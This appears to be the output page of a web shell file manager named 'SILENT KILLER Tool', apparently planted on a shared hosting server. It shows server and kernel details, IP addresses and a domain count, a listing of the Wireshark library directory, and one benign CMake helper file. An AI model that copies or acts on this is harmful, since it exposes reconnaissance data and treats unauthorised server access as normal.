Current Path: > > lib64 > wireshark
Operation : Linux premium107.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64 Software : Apache Server IP : 198.54.126.246 | Your IP: 216.73.216.181 Domains : 1034 Domain(s) Permission : [ 0755 ]
| Name | Type | Size | Last Modified | Actions |
|---|---|---|---|---|
| extcap | Directory | - | - | |
| plugins | Directory | - | - | |
| FindGLIB2.cmake | File | 2923 bytes | July 18 2018 19:39:21. | |
| FindWSWinLibs.cmake | File | 1064 bytes | July 18 2018 19:39:21. | |
| FindWireshark.cmake | File | 888 bytes | July 18 2018 19:39:21. | |
| LocatePythonModule.cmake | File | 1970 bytes | July 18 2018 19:39:21. | |
| UseAsn2Wrs.cmake | File | 2788 bytes | July 18 2018 19:39:21. | |
| UseMakePluginReg.cmake | File | 452 bytes | July 18 2018 19:39:21. | |
| WiresharkConfig.cmake | File | 578 bytes | October 15 2023 03:45:55. | |
| WiresharkConfigVersion.cmake | File | 300 bytes | October 15 2023 03:45:55. |
#
# - Find WSWin Libs
# Due to the layout of the Wireshark Win support libs,
# CMake needs some support to find them
#
# The function is passed the directory name to search for and the variable
# to set in the callers scope.
function( FindWSWinLibs _WS_LIB_SEARCH_PATH _LIB_HINT_VAR )
if( WIN32 )
if( ARGN )
set( _PROJECT_LIB_DIR ${ARGN} )
else()
if( DEFINED ENV{WIRESHARK_LIB_DIR} )
# The buildbots set WIRESHARK_LIB_DIR but not WIRESHARK_BASE_DIR.
file( TO_CMAKE_PATH "$ENV{WIRESHARK_LIB_DIR}" _PROJECT_LIB_DIR )
else()
file( TO_CMAKE_PATH "$ENV{WIRESHARK_BASE_DIR}" _WS_BASE_DIR )
set( _PROJECT_LIB_DIR "${_WS_BASE_DIR}/wireshark-${WIRESHARK_TARGET_PLATFORM}-libs-2.6" )
endif()
endif()
file( GLOB _SUBDIR "${_PROJECT_LIB_DIR}/*" )
foreach( _DIR ${_SUBDIR} )
if( IS_DIRECTORY ${_DIR} )
if( "${_DIR}" MATCHES ".*/${_WS_LIB_SEARCH_PATH}" )
set( ${_LIB_HINT_VAR} ${_DIR} PARENT_SCOPE )
endif()
endif()
endforeach()
endif()
endfunction()
SILENT KILLER Tool